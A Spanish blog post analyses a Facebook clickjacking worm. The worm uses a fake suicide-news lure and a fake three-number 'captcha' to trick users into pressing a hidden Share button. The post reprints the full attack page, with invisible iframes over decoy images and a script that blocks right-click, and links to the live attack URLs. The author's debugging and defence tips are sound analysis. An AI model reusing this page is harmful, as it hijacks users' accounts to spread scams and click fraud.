Pese a que el clickjaking es una vulnerabilidad que se conoce desde hace ya dos años, aún parece que se explota tímidamente en entornos reales. Tal vez los casos más populares son los que ocurren en redes sociales, más concretamente en Facebook, donde desde mayo se ha detectado varias veces: fbhole y I Like
Hoy cuando entre a mi cuenta uno de mis contactos había publicado una noticia sobre un suicidio que llamó mi curiosidad más escabrosa: "This poor girl commited suicide after her dad posted this to her wall". Ojo, porque pese a que cierran la página desde Facebook, la vuelven a abrir y ahora mismo está funcionando.
Cuando pulse en el enlace me extraño que solicitase una confirmación de la edad, ya que la fecha de nacimiento es algo que la plataforma conoce y ¿contenido adulto en Facebook? imposible.
Yo, que soy extremadamente inocente, buena persona y mayor de edad, decidí pulsar en la confirmación (aunque antes me había leído el código fuente de la página ).
Esta pantalla me llevo a una última donde ya se notaba los cubiletes del trilero. En ella se solicita al usuario que pulse sobre 3 números para comprobar si es humano, como si un captcha se tratase, aunque el objetivo real es hacer pulsar al usuario sobre el botón con el número 1 donde realmente se encuentra el "Compartir", tapándolo con una capa superior y de esta forma actuar como gusano para que nuestros contactos sientan la misma curiosidad que yo.
Tras compartir la información, finalmente muestra una imagen que posiblemente sea un método para ganar dinero en fraude por clicks (clickfraud)
A la fecha de la entrada, ya había más de 43.000 que habían pinchado y publicado la noticia. Aunque como la web es borrada y levantada, el contador se reinicia.
El método que yo utilicé para depurar el clickjacking fue modificar con Firebug el html quitándole la transparencia y viendo que se encontraba debajo.
Con la extensión NoScript, se podría haber detectado y prevenido su propagación.
El código aún está disponible por si queréis verlo en la URL original: http://girlkilledherself.leadhoster.com/suicide/iframe.php junto a todos los scripts: http://girlkilledherself.leadhoster.com/suicide/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>This is my title - www.YourSite.com</title>
</head>
<body style="margin:0px">
<!---pirmas tabas --->
<div style="z-index:1; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity:0.0; opacity:0.0; position: absolute;
left: 370px;
top: 205px;
background-color: #ccc;
width: 110px;
heigth: 50px;
padding: 5px;
color: white;
border: 0px;">
<iframe src="http://www.facebook.com/plugins/likebox.php?id=155921704431406&width=400&connections=10&stream=true&header=true&height=587" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:100px;" allowTransparency="true" id="lpcframe" name="lpcframe"></iframe>
</div>
<div style="z-index:1000; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity:0.0; opacity:0.0; position: absolute;
left: 221px;
top: 202px;
background-color: #ccc;
width: 108px;
heigth: 250px;
padding: 5px;
color: white;
border: 0px;
overflow: hidden;">
<iframe src="http://www.facebook.com/plugins/likebox.php?id=111287152265484&width=400&connections=10&stream=true&header=true&height=587" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:110px; height:100px;" allowTransparency="true" id="lpcframe" name="lpcframe"></iframe>
</div>
<div style="z-index:1000; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity:0.0; opacity:0.0; position: absolute;
left: 52px;
top: 282px;
background-color: #ccc;
width: 138px;
heigth: 250px;
padding: 5px;
color: white;
border: 0px;
overflow: hidden;">
<iframe style="width:300px; height:30px; border:none; margin-left: -100px;" scrolling="no" src="http://www.facebook.com/sharer.php?u=http://www.facebook.com/pages/Girl-committed-suicide-after-her-father-posted-this-to-her-wall/155921704431406" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:100px;" allowTransparency="true" id="lpcframe" name="lpcframe"></iframe>
</div>
<!-- <img top --->
<img style="position:absolute; z-index:2; top:100px; left:50px;" src="imgs/top_submit.jpg">
<!-- <img bottom> --->
<img style="position:absolute; z-index:-21; top:312px; left:50px;" src="imgs/bottom_submit.jpg">
<!-- <img 1"> --->
<img style="position:absolute; z-index:-3; top:280px; left:50px;" src="imgs/1_submit.jpg">
<!-- <img 2"> --->
<img style="position:absolute; z-index:3; top:280px; left:199px;" src="imgs/2_submit.jpg">
<!-- <img 3"> --->
<img style="position:absolute; z-index:-3; top:280px; left:348px;" src="imgs/3_submit.jpg">
<!-- <left out"> --->
<img style="position:absolute; z-index:3; top:105px; left:-65px;" src="imgs/left_white.jpg">
<a href="http://fallingdown.leadhoster.com/suicide/blind.php" allowTransparency="true" >
<img style="position:absolute; z-index:10; top:332px; left:327px; border: 0;" src="imgs/submit.jpg"></a>
<script language=JavaScript>
<!--
var message="Facebook Disabled this feature !";
///////////////////////////////////
function clickIE4(){
if (event.button==2){
alert(message);
return false;
}
}
function clickNS4(e){
if (document.layers||document.getElementById&&!document.all){
if (e.which==2||e.which==3){
alert(message);
return false;
}
}
}
if (document.layers){
document.captureEvents(Event.MOUSEDOWN);
document.onmousedown=clickNS4;
}
else if (document.all&&!document.getElementById){
document.onmousedown=clickIE4;
}
document.oncontextmenu=new Function("alert(message);return false")
// -->
</script>
</body>
</html>
1 comments :
Dicen que la curiosidad mató al gato, pero no tienen en cuenta que hay gatos demasiado listos que se lo pasan pipa con los anzuelos!
(no como los 8k a los que le gusta la poor girl)
Publicar un comentario